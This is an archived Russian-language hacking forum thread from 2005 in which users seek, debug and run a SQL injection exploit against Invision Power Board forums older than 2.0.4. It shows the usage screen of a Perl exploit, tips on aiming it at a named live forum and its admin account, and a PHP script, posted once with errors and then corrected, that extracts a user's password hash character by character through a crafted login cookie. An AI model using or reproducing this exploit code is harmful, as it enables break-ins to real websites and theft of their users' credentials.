PDA

Просмотр полной версии : Исправный сплоит под ИПБ 2.0.4


devil
28.07.2005, 00:35
у кого есть сплоит без бага если не трудно вышлите на devil_155@mail.ru
И можно описать как конкретно им пользоваться и можно ли использовать для этого прогу perl5_6_0_small

RAMPART
28.07.2005, 00:41
Smotri video, chitai i practikyisia. A exploiti kachai s antichata-oni good =)

devil
28.07.2005, 01:17
а ссылочку конкретно не подкинешь? на сплоит?

WizART
28.07.2005, 03:52
лолы, я такого сплойта не видел, а так иди на сайт RusH'евцев www.rst.void.ru

devil
28.07.2005, 04:40
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

C:\Documents and Settings\Devil>cd\

C:\>Perl\bin\perl.exe C:\ipb.pl http://ns-forum.net/ 1 0
Can't locate IO/Socket.pm in @INC (@INC contains: C:/Perl/lib .) at C:\ipb.pl li
ne 37.
BEGIN failed--compilation aborted at C:\ipb.pl line 37.

Что я делаю не так?

devil
28.07.2005, 04:44
Если не трудно напишите какие команды нужно вводить =)

WizART
28.07.2005, 05:27
devil
У тебя не стоит ActivePerl, скачай его с www.denwer.ru и поставь, потом все делай так же...

WizART
28.07.2005, 05:28
А вводить чуть по другому надо, если форум стоит в головном каталоге то пиши так:
C:\>Perl\bin\perl.exe C:\ipb.pl http://ns-forum.net / 1 0 просто слеш надо ставить там где указываешь [/folder/]

WizART
28.07.2005, 05:30
И к сведению, там стоит форум =>2.*, так что пиши не 0, а 1!

WizART
28.07.2005, 05:31
а так-же, там нету пользователя с Id=1, вот рябетня, а баги проштопали...

devil
28.07.2005, 18:41
У меня стоит перл, только демо версия, а пользователь там такой есть, ник Серж, админ =)

GreenBear
28.07.2005, 18:45
У меня стоит перл, только демо версия
ЧЕГО ЧЕГО?! впервые слышу чтоб у перла есть демо-версия...

Loo
28.07.2005, 18:57
а что делать, если пишет can't locate object method "get" via package "LWP::UserAgent"
версия перла 5.6.1.631..
PS сорь, что не по теме..

WizART
28.07.2005, 21:48
Да блин :( тупой чтоли!? Извиняюсь, Актив перл поставь, и баги будет меньши...

Loo
28.07.2005, 22:24
актив перл стоит.. библиотеки навена не хватает, а откуда скачать я нинаю..

WizART
28.07.2005, 22:28
качай актив перл новый с денвера
http://denwer.ru

WizART
28.07.2005, 22:29
Если совсем ламо, на ссылку http://www.denwer.ru/dis/ActivePerl/2002-11-26_ActivePerl5.6.1.exe

Grrl
30.07.2005, 00:55
http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.3.809-MSWin32-x86.msi

перл под форточки с инсталятором.

WizART
30.07.2005, 01:26
М-дааа народ, а что уже ручками никак пользоваться не получается, ведь есть такая 4тука как яндекс, гугла, рамблер...

devil
31.07.2005, 05:22
блин нифига не шарю...чо опять не так?
Подскажите правильную строчку
C:\>perl\bin\bin\perl.exe c:\ipbhack.pl ns-forum.net/ 2 1

Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]

[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute

targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru

devil
31.07.2005, 06:09
вся спасибо я нашёл ошибку...только дыру залатали уже -((

Loo
31.07.2005, 16:06
WizART
да слышь, харе уже.....
просто у миня всё было... (актив перл) а LWP не пашет...
devil
ну есессно заделали, не идиоты ведь, навена..

Loo
31.07.2005, 16:22
ладно, поф на юзерагент
объясните, вот тут ошибка в 7 строке пишет, но почему??
<?
set_time_limit(999999);
$zap="http://staff/forum/index.php?act=Login&CODE=autologin" ;
$user=3;
$sh=array("0","1","2","3","4","5","6","7","8","9","a","b","c ","d","e","f");
$hash=;
for( $i=1; $i <33; $i++ ){
for( $j=0; $j < 16; $j++ ){
$current=$sh[$j];
$sql="99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$ current%2527)/*";
#$sql="99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1) %3d%2527$current%2527)/*";
$cook="pass_hash=$sql;member_id=$user";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 2);
curl_setopt($ch, CURLOPT_URL, $zap);
curl_setopt($ch, CURLOPT_COOKIE, $cook);
$xyz = curl_exec ($ch);
curl_close ($ch);
if (preg_match("/CODE/i", $xyz)) {
} else {
$hash.=$sh[$j];
}
}
}
echo $hash;
?>

WizART
31.07.2005, 16:33
М-даа...фатально...

Nexwill
27.08.2005, 00:16
Подскажите , почему место хеша мне выдаёт такую хрень: ******************

ProTeuS
27.08.2005, 02:19
Подскажите , почему место хеша мне выдаёт такую хрень: ******************

иЩи АшиПки и правь сплойт!

SK | Heaton
27.08.2005, 09:31
2 ProTeuS нет там общибок просто сплойт старый а форум пропаченный...
вот и выдает ***** или 0000

Nexwill
27.08.2005, 11:16
А где можно сплоит новый найти?))))

nighthunter
27.08.2005, 13:58
Loo
В скрипте куча ошибок.
Вот с исправлениями:

<?
set_time_limit(0);
$zap='http://.ua/forum/index.php?act=Login&CODE=autologin' ;
$user=1;
$sh=array('0','1','2','3','4','5','6','7','8','9', 'a','b','c','d','e','f');
$hash='';
for( $i=1; $i < 33; $i++ ){
for( $j=0; $j < 16; $j++ ){
$current=$sh[$j];
$sql='99%2527+OR+(id%3d'.$user.'+AND+MID(password, '.$i.',1)%3d%2527'.$current.'%2527)/*';
//Для ИПБ 2.*
//$sql="99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1) %3d%2527$current%2527)/*";
$cook='pass_hash='.$sql.';member_id='.$user.'';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 2);
curl_setopt($ch, CURLOPT_URL, $zap);
curl_setopt($ch, CURLOPT_COOKIE, $cook);
$xyz = curl_exec($ch);
curl_close ($ch);
if (preg_match("/CODE/i", $xyz)) {
}
else
{
$hash.=$sh[$j];
}
}
}
echo $hash;
?>

WizART
28.08.2005, 20:05
$crcheck = ""; вот тут ашипка, поставь нужное значение (=$i) между кавычками и будет тебе хеш вместо ****
$crcheck = "=$i";